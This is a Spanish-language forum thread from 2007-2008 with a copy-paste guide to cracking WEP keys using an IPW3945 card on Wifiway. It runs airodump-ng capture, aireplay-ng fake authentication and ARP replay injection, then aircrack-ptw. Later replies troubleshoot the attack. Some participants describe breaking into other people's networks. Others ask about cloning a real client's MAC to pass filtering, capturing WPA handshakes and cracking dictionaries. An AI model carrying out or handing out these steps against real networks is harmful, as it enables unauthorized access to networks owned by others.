Seguridad Wireless - Wifi

Suite Seguridad Wireless => Manuales de Wifislax & Wifiway => Mensaje iniciado por: emudem en 05-05-2007, 17:13 (Sábado)

Título: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 05-05-2007, 17:13 (Sábado)
Actualizado el 27 Junio 2008

Bueno deciros que con copiar y pegar inyectareis:

Es necesario tener en cuenta la siguiente lista para que todo vaya bien:

-Tener la tarjeta wifi Intel IPW3945 no sirven modelos superiores.
-A ser posible que sea en portatil (no conozco esta tarjeta wifi en los sobremesa... pero por si acaso)
-Tener buena calidad de señal ya que si la señal es débil no inyectareis.
-Se han dado casos que con buena señal no se inyectaba, el problema se suele resolver moviendo el portatil hacia otro lugar para evitar interenferencias con otros aparatos que esten por los 2.4gz que usa el wifi. (microhondas...) Además la IPW3945 flojea un poco a la hora de enviar datos por lo que puedes tener 90% recibiendo y 10% enviando.

Descargar WIFIWAY 0.4 (http://www./public/wifiway/0.4/wifiway-0.4.iso) - WIFIWAY 0.6 (http://www./public/wifiway/0.6/wifiway-0.6.iso) - WIFIWAY 0.8 (http://www./public/wifiway/0.8/wifiway-0.8.iso) de nuestro amigo Hwagm o el WIFISLAX 3.1 (http://download.wifislax.com/wifislax-3.1.iso)


PASOS

Abrimos una consola

Código: [Seleccionar]
kwrite /sys/class/net/wifi0/device/channel
Importante: El canal AP debe corresponder al mismo canal del router que queremos atacar, eso lo podeis ver cuando ejecutáis vuestro sistema operativo y buscais redes wifi.

Canal de AP si pones 11 (11 es un ejemplo) normalmente muestra algunos puntos de acceso cuando ejecutes airodump, guardamos y cerramos. Los canales oscilan de 1 a 13 aunque en algunas ocasiones he visto mas de 13.

Cogemos el BSSID del AP (router)

Código: [Seleccionar]
airodump-ng wifi0
Una vez aparezcan los BSSID pulsamos CTRL+C (para parar el proceso)

Código: [Seleccionar]
kwrite /sys/class/net/wifi0/device/bssid
Ponemos el BSSID del AP y guardamos pero no cerramos el archivo por lo visto hay incompatibilidades si cerramos.

Código: [Seleccionar]
airodump-ng -c CANAL DEL AP -w DATOS wifi0
Abrimos otra consola

Código: [Seleccionar]
kwrite /sys/class/net/wifi0/device/rate
Lo ponemos a 2, guardamos y cerramos.

Para ahorrarnos estos pasos os podeis DESCARGAR EL SIGUIENTE SCRIPT (http://telefonica.net/web2/wifislax/wifiway/ipw3945.sh) solo válido para la distribución de wifiway.

Para ejecutarlo poner en consola (shell) y seguir los pasos.

Código: [Seleccionar]
./ipw3945.sh

Seguimos con la inyección, levantamos la interfaz wifi

Código: [Seleccionar]
ifconfig wifi0 up

Cogemos la MAC de tu WIFI0. Los 12 primeros numeros de HWaddr cambiamos los " - " por " : " (guiones por dos puntos)

Ejemplo: 12-58-47-FD-AD-8F-00-00-00-00 se cambia por 12:58:47:FD:AD:8F

Código: [Seleccionar]
ifconfig


Código: [Seleccionar]
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
También podeis poner

Código: [Seleccionar]
aireplay-ng -1 10 -a BSSID -h MAC WIFI0 -e ESSID wifi0
de esta manera se asocia automáticamente cada 10 segundos para aquellos que pillais alguna ARP y luego no suben.

Una vez autentificados abrimos otra consola y ponemos

Código: [Seleccionar]
aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0
Esperamos un rato como mucho 15 minutos y veréis como suben los ARP.

El ataque utilizado es el AP1 de falsa autentificacion tambien funciona con el AP0 pero no lo he probado.


Si os pilla alguna ARP pero no sube iros a la consola que tiene el AP1

Código: [Seleccionar]
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
Y lo ejecutáis de nuevo hasta que os autentifique o se os suban los ARP.

Si no autentifica fijaros que el RXQ (airodump-ng) se mantenga por encima del 50% de no ser así los DATA no subirán rápido, normalmente es debido a que el ARP se encuentra demasiado lejos.

Por ultimo cuando tengamos mas de 100.000 DATA en airodump-ng ejecutamos en otra consola.

Código: [Seleccionar]
aircrack-ptw DATOS-01.cap
No es necesario parar los procesos para buscar la clave, puede seguir subiendo DATA por si acaso no encuentra la clave WEP y volver a intentarlo más adelante por ejemplo con 150.000 DATA

Al cabo de un rato (un minuto como máximo) os saldrá KEY FOUND con la clave wep.

Salu2  ;)
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 05-05-2007, 20:40 (Sábado)
Video grabado por mi movil w800i perdonen la calidad pero al menos se ve todo el proceso.

VIDEO IPW3945 INYECTANDO (http://www.youtube.com/watch?v=voyvusZdcn8)
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: Hwagm en 05-05-2007, 23:00 (Sábado)
jejje, gracias.

Ya tenemos fichada tu mac de la tarjeta, como son unicos ya sabemos todo tu historial laboral, jejej.

Con una camara mas profesional hubiera sido la ostia.

Pero esta claro que es el 1 video de una ipw3945 inyectando.  ;)
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: juanjetomas en 05-05-2007, 23:24 (Sábado)
Gracias amigo, muy buen manual por fin he podido inyectar  ;D  ;D  ;D

Os cuento, pillo 3 apr, y aireplay se lia a enviar paquetes como loco, lo que pasa, es que en airodump las datas no  suben. Suben los paquetes de airodump, pero no las datas

En 30 minutos he pillado 420000 paquetes.

Además, si intento abrir el fichero con aircrack-ng, poniendo :


Código: [Seleccionar]
aircrack-ng NOMBRE_DEL_FICHERO

Me dice que no lo encuentra, y si pongo

Código: [Seleccionar]
aircrack-ng *.cap
Pues me dice que no tengo suficientes ivs, normal ¿no?

Y además, si pongo

Código: [Seleccionar]
aircrack-ptw NOMBRE_DEL_FICHERO
Me dice que no lo encuentra

¿Alguien sabe el motivo de esto?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 06-05-2007, 01:40 (Domingo)
jejje, gracias.

Ya tenemos fichada tu mac de la tarjeta, como son unicos ya sabemos todo tu historial laboral, jejej.

Con una camara mas profesional hubiera sido la ostia.

Pero esta claro que es el 1 video de una ipw3945 inyectando.  ;)

Ya se las consecuencias de enseñar la mac de mi tarjeta, total mientras sea mia y como yo no tengo problema en publicarla pues....  ;)

Lo unico que queria es capturar la inyeccion de la ipw3945 de manera visual, intentaré pillarme una camara de dvd o aprender a usar el capturador de pantallas en linux.

juanjetomas por msn me explicas que te ocurre y seguimos con la tarea, poco a poco vas progresando y veras como al final lo consigues  :D
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: Hwagm en 06-05-2007, 02:10 (Domingo)
Bueno yo creo que en las live que se hicieron, mas de un dato de mis tarjetas han quedado grabadas para la posteridad, jejej.

Lo del camara de dvd si que me parece buena idea.  :D
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: gruke en 06-05-2007, 09:02 (Domingo)
Todo perfecto  ;), me funciono a la primera
Duda en Wifiway, pormas que intente no logre montar mi Pendrive sandisk :'(

Al final ni se necesito pero me quede con ganas jejej

Por ultimo, hay alguna forma de saber la poscion de access ?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: Hwagm en 06-05-2007, 09:48 (Domingo)
Cuando me relaje un poco mirare de montar el pendrive que tengo, y ver cuales son los problemas.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: juanjetomas en 06-05-2007, 11:42 (Domingo)
Esta noche he dejado esto para que se tirara toda la noche inyectado. Pero me sigue pasando lo mismo  :-\  ???

Aireplay se lia a mandar paquetes como loco, pero en airodump no suben las datas, solo suben los paquetes. Por consejo de Hadrianweb, me dijo que si no subian las datas, que mirara de nuevo el archivo bssid, pero estaba bién, además, no lo había cerrado. Pero cerré, y volví a abrir.

He tenido 6.000.000 paquetes, pero las datas, ni 170


Sobre aircrack-ptw, sigue sin encontrarme el archvo. Como nombre le puse vista, y con este:

Código: [Seleccionar]
aircrack-ptw vista.cap
Pero no lo encuentra. Yo miro con el explorador de archivos, y el fichero cap está ahí, pero aircrack no lo encuentra...

Saludos, a ver si alguien puede resolver mis dudas.
  ;D  ;D
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: pianista en 06-05-2007, 11:58 (Domingo)
Haz desde la consola que haces el aircrack un ls y si te sale ahi es que si que esta..Si no, es que esta en otro directorio...  ;)
Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: juanjetomas en 06-05-2007, 18:56 (Domingo)
Menos mal, ¡my first key found! Ya tenía ganas, ojú, por fín.  ;D  ;D  ;D  ;D  ;D  ;D  ;D

El problema es que después de empezar a pillar arp, me pillaba 3 o 4, y no subían las datas. Era porque tenía que hacer el ataque 1 de nuevo, por si estaba mal asociado.

Y sobre lo del aircrack-ptw, el fallo es que el nombre del archivo no lo ponía bien. Por ejemplo, si el archivo es fiesta, se debe poner:

Código: [Seleccionar]
aircrack-ptw fiesta-01

Muchas gracias por el tuto de nuevo, y por la live, sois unos campeones.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: Hwagm en 06-05-2007, 19:09 (Domingo)
fabuloso el comando  ls verdad?

Asi pues el tema de la inyeccion de las ipw3945, ya pertenece al pasado, esta mas que superado, ahora nos quedan las zydas, jejje
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: dafuer en 06-05-2007, 19:25 (Domingo)
Al pasado pasado.... Yo todavia no lo he conseguido, pero no he tenido suficiente tiempo para probarlo. Algo que me ha llamado la atencion de lo que he probado hasta ahora (que creo que con otras tarjetas no pasaba) es que cuando me asocio para inyectar, al poco se "cae" y tengo que volver a asociarme. Es normal?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 06-05-2007, 19:36 (Domingo)
si, porque seguro que la señal de la BSSID decae bastante perdiendo asi su asociacion con el AP
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: doramas en 07-05-2007, 00:50 (Lunes)
Hola, soy nuevo por aquí y debo decir que soy un tronco con el linux, pero el que la sigue la consigue. Hace un rato que conseguí mi primera clave wep siguiendo este manual, pero tuve que hacer algunos cambios, comento.
Si pongo el canal a 11 en "mousepad /sys/class/net/wifi0/device/channel" , sólo me muestra algunas ap, así que fui probando a partir del 1 hasta que conseguí interceptar varias, en mi caso el número 2.
Después todo bien hasta la autentificación, que no había manera, pero en "mousepad /sys/class/net/wifi0/device/channel" volví a cambiar el canal al que iba dirigido el ataque y a partir de ahí todo fue como la seda.
Espero que le pueda servir a alguien.
Gracias a todo el equipo por el trabajo que hacéis, ya que sin vosotros aún estaría perdido en esto.
Saludos.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: guanchito03 en 07-05-2007, 09:38 (Lunes)
Aún no he conseguido ninguna key :(. El problema q tengo es q no me suben los arp, debido a q no se porq se me desasocia. Le puse la opcion 30 en el ataque 1 para q este continuamente asociando pero a la 3 o 4 ya no se asocia. Miro el archivo bssid y sigue bien, lo dejo abierto por si acaso e igual resultado. Se os ocurre algo?
Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 07-05-2007, 12:09 (Lunes)
Si no lo haces con tu router puede ser que la victima tenga filtros de MAC y que la señal baje considerablemente. Fijate bien en el campo "RXQ" de airodump-ng y que no baje de 70.

De todas maneras Hwagm haber si te puede decir mas al respecto, yo cuando pueda echare un vistazo para ver si conseguimos un ataque algo mas efectivo
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 07-05-2007, 12:39 (Lunes)
Ahora mismo estoy comprobando un AP que pasa exactamente lo mismo y es que por mucho que uno espere los ARP no suben.

Estoy haciendo un empleo interactivo de paquetes en tiempo real para ver si pillo algun data valido del cliente conectado al AP.

Si logró hacer funcionar este ataque lo pondré como alternativa y paso a paso como se debe ejecutar.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: guanchito03 en 07-05-2007, 13:44 (Lunes)
Ok, ya nos dices.. en cuanto a la RXQ esta bastante alta ya q me puse casi pared con pared. entorno al 89-100 de señal.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 07-05-2007, 16:06 (Lunes)
Al final me he dado cuenta de porque no subian los ARP, aunque tengo un 90% de señal a la hora de pillar cualquier ARP la señal baja a 10% o incluso menos y vuelve a subir rapidamente, por lo que la señal es alta para recibir pero la fuerza de nuestra ipw3945 es mas debil para enviar al AP por lo que jamas subiran ARP, cambiando de posicion. La señal  era un poco mas baja un 80% pero bajaba a 40% a la hora de enviar con la ipw3945 y al cabo de un rato (4 minutos) ARP como un tubo.

Conclusión o te está pasando lo mismo o la red que quieres pillar tiene WPA, asi que mirate primero como obtener un wep key haciendo pruebas con tu router y no pillando de gorra para las pruebas  ;)

Un salu2 y ya nos contarás que tal va.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: guanchito03 en 08-05-2007, 13:19 (Martes)
Lo he probado siguiendo los pasos del video de hadrianweb y muy cerca del ap y perfecto. Los principales problemas entoncs son en la emision del ipw3945 al ap, aunq tengas buena recepcion parece que no es suficiente.
Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: bitelchus en 08-05-2007, 15:07 (Martes)
Hola a todos,

siguiendo el manual que hay publicado no tengo ningun problema si estoy al lado del AP. En cambio si estoy alejado(teniendo una señal aceptable), me autentica, me suben paquetes arp, pero de datos nada. ¿Puede ser que hay que tener una señal mas que aceptable para capturar datos?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 08-05-2007, 20:01 (Martes)
El problema está en que la señal es mucho mas debil de nuestra tarjeta al router por lo que no se pillan ARP porque no hay respuesta debido que no llega la señal.

Puedes tener un 80% de señal pero la de la tarjeta cuando envia paquetes puede ser de 10 o nula.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: bitelchus en 08-05-2007, 20:13 (Martes)

Entonces solo sirve si estas muy cerca?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: juanjetomas en 08-05-2007, 23:23 (Martes)
Creo que no. En mi caso, aunque estaba muy cerca, aunque pillaba arp, las datas no subían, y eran muy pocos. Mi solución fué asociarme de nuevo, en el proceso, otra vez me asociaba.

Aunque cuando la primera vez lo hacía, me confirmaba que estaba bien, lo tenía que hacer otra vez.


Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 09-05-2007, 00:36 (Miércoles)
eso esta claro, jeje solo digo que si te asocias bien algunas veces y otras le cuesta y no suben los ARP significa que la señal no es realmente buena.

Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: ebola_30 en 09-05-2007, 01:49 (Miércoles)
yo he conseguido reinyectar pero a camara lenta.cojo 20 ivs/seg. es super lento.la reinyeccion va a tronpicones.el pwr marca -1 y el rxq 6.
el rate lo tengo a 2. como hay cliente conectado hago el ataque 3.
puede ser por mala señal que vaya tan lenta la reinyeccion?  o puede ser por la ipw 3945 que es sorda? pues me pilla muy pocas redes con la distro.un saludo
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: guanchito03 en 09-05-2007, 09:23 (Miércoles)
Yo aun teniendo ap casi al lado tengo q asociarlo de vez en cuando porq se paran los arp. la verdad q es una jodienda q con poca señal no se consigan, ya que las demas redes q tengo por ahi no tengo suficiente potencia.
Otra cosilla aparte. Ayer pille una clave y al conectar ya con windows me conecta pero luego no me da ip, eso es q tiene el cable de telefono desconectado, o tiene filtro de ip? Esto ultimo se podria arreglar?? jiij
Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: pianista en 09-05-2007, 09:48 (Miércoles)
Eso es que seguramente tenga dhcp deshabilitado, tendras que sniffar trafico y analizarlo...
Respecto a la velocidad, depende mucho de donde este el AP, y la verdad es que daros cuenta que aun es un poco beta el driver, quiero decir que no reinyectara a las mil maravillas, demosles aun un poco de margen para mejorarlo ;)
Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: guanchito03 en 09-05-2007, 10:08 (Miércoles)
Citar
Eso es que seguramente tenga dhcp deshabilitado, tendras que sniffar trafico y analizarlo...

Podrias decirme como??

he puesto una ip y conecta, pero luego no navega, sera q falta los dns?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: pianista en 09-05-2007, 12:12 (Miércoles)
Mira en las propiedades de red lo que te da..
Puede que no te de nada o te de unas cosas bastantes raras...
Un ejemplo comun de router seria aquel que te diera por ejemplo de puerta de enlace una 192.168.X.1, de mascara 255.255.255.255.0...
Si solo faltan los dns busca los genericos de las compaiñas y vete probando...
La forma, es con el airodump cuando haya station verdadera conectada, capturas en cap, no en ivs y despues con la clave de la wifi lo desencriptas con airdecap...
Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: 5hogo en 09-05-2007, 22:25 (Miércoles)
Buenas,
He seguido los pasos del manual y me ha funcionado todo a la primera!!
Quiero felicitar a todas las personas que hacen esto posible por ese gran trabajo que realizan.. ahora solo falta ir mejorando esta distribucion poco a poco haciendola mas comoda y bonita, lo dificil ya está hecho! FELICIDADES!

Por otra parte aprovecho el post para preguntar, ya que no soy un entendido en esto y lo que consigo, es gracias a ir machacando y aprendiendo con todo lo que se dice por aqui. Bien..

¿El metodo explicado para sacar la key en este post sirve tanto para WEP/WPA/WPA2?
¿Si el AP tiene un filtrado de MACs el proceso es el mismo a seguir o difiere?De que manera?

Saludos!!
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: pianista en 09-05-2007, 22:43 (Miércoles)
A ver para hacerlo para wpa solo seria hacer A0s hasta que consiguieras el handshake...
Respecto al filtrado, lo unico que habria que cambiar es que si no tienes clientes conectados verdaderos, tendrias que hacer un A1 con una mac que no estuviera filtrada, es decir con una mac que usara un usuario real...
Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: antoniohuesas en 10-05-2007, 21:15 (Jueves)
Hola por favor alguien me puede decir como iniciar la cd live de wifiway. He quemado la iso en un cd y me sigue arrancando windows y no con el cd.
Ayuda please
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: pianista en 10-05-2007, 21:24 (Jueves)
Mira en la bios de tu ordenador como cambiar la prioridad de arranque...
En algunos ordenadores pulsando F12 al principio te deja elegir unidad...
Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: antoniohuesas en 10-05-2007, 21:41 (Jueves)
Yo pulsaba F5, pero desde ahí no me deja hacer nada mas. Entonces pulso F12 mientras arranca y despues q? Perdona pero yo es q de informatica tampoco soy un crack.
Aver si puedes detallarme mas q tengo q hacer. Gracias y un saludo
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: unbas en 10-05-2007, 22:24 (Jueves)
Para acceder a la bios en la maioria de los sobremesa es pulsando suprimir ... accedes a la bios y buscas alguna opcion de arranque ... una vez la encuentres seleccionas q el first boot sea el cd-room ...

En los portatiles ...no se eactamente cual es el boton de acceso a la bios ...
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: antoniohuesas en 10-05-2007, 22:45 (Jueves)
Ok solventado gracias a pianista. En mi caso al menos es pulsando F2 asi q si a alguien mas le sirve de ayuda ahí queda. Despues simplemente cambiando la prioridad del BOOT.
Gracias a ambos. Saludos a todos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: masnatacion en 11-05-2007, 05:31 (Viernes)
cuando tecleo esto en la terminal:
Código: [Seleccionar]
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
Este error me manda:

Código: [Seleccionar]
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request

Attack was unsuccessful. Possible reasons:
*Perhaps MAC address filtering is enable
*Check that the BSSID (-a option) is correct
*Try to change the number of patched for injection
*This attack sometimes fails against some APs
*The card is not on the same channel as tha AP
*Injection is not supported AT ALL on HermesI, Centrino, ndiswrapper and a few others chipsets
*You are too far from the AP . Get closer or lower the transmit rate (iwconfig <iface> rate 1M)

Espero que me puedan ayudar.

Un saludo
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: pianista en 11-05-2007, 09:04 (Viernes)
Podria ser perfectamente que esta parcheado contra ese ataque el router, o bien que tiene filtrado de mac, o bien que estas muy cerca del router...
Yo probaria a cambiarte la mac por una que use una station real...
Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: guanchito03 en 11-05-2007, 13:58 (Viernes)
Muy cerca del router no creo, mas bien sea que estas muy lejos. Tienes que tener buena señal de recepcion y de transmision al router.

Otro tema : Utilice el airdecap con el archivo de me dio el airodump cuando saque la clave y luego use el ethereal con el q me genera este. Pero las ip que me salen son solo las mias y la mac que tengo yo. Como puedo ver la ip del router. El programa look lan hace algo de eso?
Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: unbas en 11-05-2007, 20:59 (Viernes)
Si claro el look at lan ... es un scanner de ip, te saca todas las ips dentro de la red ... es bueno para ver si tienes gorrones conectados ...

En el ethereal ... tb se pueden saber las ip's ... hay un manual sobre ello ...
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: bitelchus en 12-05-2007, 04:30 (Sábado)
Bueno, bueno.....muy buen trabajo...todo va como la seda.
Pero tengo una dudilla...¿como puedo ejecutat el live cd o el iso en una maquina virtual?. Lo he probado con VMWARE, PC Virtual 2007 y Virtual PC Box, en ninguno me detecta la tarjeta inalambrica, solo la de loopback. Si no es posible, ¿se puede instalar wifiway en la maquina virtual?. Y ya se que parece rizar el rizo...pero y ¿si instalo WXP en la maquina virtual y de ahí arranco Wifiway?, ¿sera diferente?
 [size=12pt][/size]
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: Hwagm en 12-05-2007, 22:32 (Sábado)
nunca entendi el tema de los emuladores, porque no arrancarlo como live.

y grabar datos en un pendrive, yo creo que como live, va bastante rapido
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: bitelchus en 13-05-2007, 02:46 (Domingo)
A ver, a ver explicame esto del pendrive....Me sirve otra solucion porque lo que estoy harto es de apagar el pec cada vez que quiero conmutar entre algun  live ce y windows...
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: 1 en 13-05-2007, 15:49 (Domingo)
la verdad es q lo he hecho tal cual y fantastico, pero en vista de que esto empieza a ser de dominio publico habra que ir pensando en otras encriptaciones.

pese que a mi me ha ido de perlas con las wep. he estado leyendo y para wpa psk dicen q es posible pero necesito un diccionario.

¿alguien me puede linkear algun diccionario lo menos "humano" posible?
y sabeis si el wifiway tiene integrado el cowpatty o hay q descargarle aparte?
y un tutorial para el cowpatty? xq creo q es un acelerador de prueba de palabras, ¿no es asi?

una pequeña duda, si tengo una wep pero muy debil, ¿como lo soluciono? porque en este caso se me desasocia muy rapidamente.

gracias a todos, los creadores de los tutoriales y del magnifico y fabuloso wifiway
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: antoniohuesas en 13-05-2007, 18:57 (Domingo)
Hola qtal stais? He conseguido iniciar la cd live de wifiway pero me han surgido pronto los problemas.
Al logearme introduzco de login: wifiway y cuando voy a introducir el password el teclado no me escribe. Por favor necesito ayuda.
Saludos y gracias
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: JosePromesa en 13-05-2007, 19:24 (Domingo)
antoniohuesas:
Introduce el usuario y contraseña tal como te dice, cuando introduces la contraseña, a mi tampoco me va el teclado, pero eso no es así, el teclado sí que funciona correctamente. Introduce la contraseña y luego enter.
Saludos !!!
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 13-05-2007, 23:31 (Domingo)
antoniohuesas:
Introduce el usuario y contraseña tal como te dice, cuando introduces la contraseña, a mi tampoco me va el teclado, pero eso no es así, el teclado sí que funciona correctamente. Introduce la contraseña y luego enter.
Saludos !!!


Exacto, esto pasa en el 99% de los linux  ;D
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 13-05-2007, 23:33 (Domingo)
cuando tecleo esto en la terminal:
Código: [Seleccionar]
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
Este error me manda:

Código: [Seleccionar]
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request

Attack was unsuccessful. Possible reasons:
*Perhaps MAC address filtering is enable
*Check that the BSSID (-a option) is correct
*Try to change the number of patched for injection
*This attack sometimes fails against some APs
*The card is not on the same channel as tha AP
*Injection is not supported AT ALL on HermesI, Centrino, ndiswrapper and a few others chipsets
*You are too far from the AP . Get closer or lower the transmit rate (iwconfig <iface> rate 1M)

Espero que me puedan ayudar.

Un saludo

Esto tambien pasa cuando la señal es debil
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: 1 en 14-05-2007, 13:03 (Lunes)
perdonad por repetirme, pero necesito contestacion

¿alguien me puede linkear algun diccionario lo menos "humano" posible ( y que sea gratuito, of course)?
Que sabeis del  cowpatty? xq creo q es un acelerador de prueba de palabras, ¿no es asi?

una pequeña duda, si tengo una wep pero muy debil, ¿como lo soluciono? porque en este caso se me desasocia muy rapidamente.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: ClaraHw en 15-05-2007, 16:27 (Martes)
Sobre el cowpatty si es una especie de acelerador como tu le llamas diccionarios hay ... pero eso de poco humanos no lo entiendo ...  ;D ;D q creo q por la zona de  ::) wireless hay ... un par de GB en diccionarios en el universo wireless ... deberian de estar ...

Sobre la wep a q te refieres con debil? ¿al cifrado? ¿a la cobertura? ...
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: antoniohuesas en 15-05-2007, 19:00 (Martes)
Hola! Ya hago todo el proceso xo no me logra autentificar tal y como escribe Emudem.
Alguien me puede echar un cable?
Y como dice si la señal es baja, q solución hay?
Gracias y espero respuestas
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: antoniohuesas en 15-05-2007, 20:40 (Martes)
Se me olvidaba el RXQ esta a 100% xo cuand se intento realizar la autentificación se baja a apenas el 10%. Q solucíones proponeis, gracias.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: 1 en 15-05-2007, 23:23 (Martes)
debil en cuanto a señal-
humanamente me refiero a clave sin orden "sdfdsfsa " no "abuelito"
y gb de diccionarios...donde ? linkeamelo please
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: 5hogo en 17-05-2007, 11:26 (Jueves)
Bueno despues de que todo me funcionara a la primera y consiguiese la clave de la red wifi sin ningun tipo de problema y debido a que no soy un entendido en redes y linux, me dispongo a intentar comprender el por que de cada cosa y entender exactamente el proceso del manual..

Ya desde un principio tengo duda con el primer paso:

mousepad /sys/class/net/wifi0/device/channel

Editado: No lo entiendo, use el canal que use.. el airodump me detecta diversas redes de ese canal más redes de canales cercanos al que yo especifiqué, es normal  ???
No hay forma de scanear todas las redes de todos los canales como sucede con el wifislax? Para no tener que ir modificando el archivo channel y luego tirar de airodump para cada canal...

Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 18-05-2007, 11:37 (Viernes)
Solo se pueden snifar de canal en canal por ahora. Es cierto que pones un canal y te salen otras redes de distintos canales pero no me he puesto a investigarlo a fondo aunque creo que es algun fallo de airodump, lo que si te puedo asegurar que si no pones el canal que quieres utilizar te puede fallar la inyeccion o incluso el airodump-ng.

Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: pianista en 18-05-2007, 13:48 (Viernes)
No es un fallo, se llama superposicion si mal no recuerdo...
Es debido a que las redes no emiten en una frecuencia fija y hay veces que se solapa el canal con el otro...
Habia un post interesante en elhacker del qu se hablaba, a ver si lo busco esta noche ;)
Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: dsalazar en 18-05-2007, 17:19 (Viernes)
tengo una laptop con t. wireless interna 3945, utilizo el wifiway, y hago esto paso a paso, pero al hacer el airodump-ng rtap0 en el BSSID que detecta es la MAC addrress de un equipo que esta conectado a la red, y no veo el BSSID del AP, no el channel me marca 0, y se que esta en el 6, y el ESSID me dice: <length: 0>. por consiguiente ya no puedo hacer el aireplay-ng -1 10 -a BSSID -h MAC WIFI0 -e ESSID wifi0, al no tener el dato, a que se deberá?, espero que me puedan ayudar, soy nuevo en esto, saludos desde monterrey, mexico.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: bornone en 18-05-2007, 17:36 (Viernes)

Buenas a ver si algun coleguilla me pudiera echar un cable-less  ;D

Tengo un portatil compaq presario V6000 y al arrancar desde el cd wifiway, todo correcto, arranca desde cd y despues pone inciando linux y tal, pero tres lineas despues la pantalla se queda en negor y no se ve nada mas, despues de 1 minuto todo se para, cd discos duros etc, y no hace anda mas, se queda en negro, curiosamente si pulsas intro lee el cd un ratoy  depsues para para quedarse como en todo momento en negro

que puede ser? puede ser q al tener la pantalla esta alargada no la detecta wifiwy y no se ve nada? alguno me puede echar un cable-less???

Venga que tengo ganas de ponerme a hacer cosillas como vosotros  :P

gracias por adelantado

bor
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 19-05-2007, 02:25 (Sábado)
Has comprobado que el cd este perfectamente grabado con su checksum correspondiente y demás?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: antoniohuesas en 19-05-2007, 14:08 (Sábado)
Quiero mandar un saludo a todos en general, xo sobre todo a aquellos q me han ayudado.
También felicitar al equipo de administradores y colaboradores.
Por todo el trabajo realizado
Un aplauso, campeones.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 19-05-2007, 14:33 (Sábado)
Gracias.  ;)
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: 5hogo en 21-05-2007, 10:40 (Lunes)
tengo una laptop con t. wireless interna 3945, utilizo el wifiway, y hago esto paso a paso, pero al hacer el airodump-ng rtap0 en el BSSID que detecta es la MAC addrress de un equipo que esta conectado a la red, y no veo el BSSID del AP, no el channel me marca 0, y se que esta en el 6, y el ESSID me dice: <length: 0>. por consiguiente ya no puedo hacer el aireplay-ng -1 10 -a BSSID -h MAC WIFI0 -e ESSID wifi0, al no tener el dato, a que se deberá?, espero que me puedan ayudar, soy nuevo en esto, saludos desde monterrey, mexico.

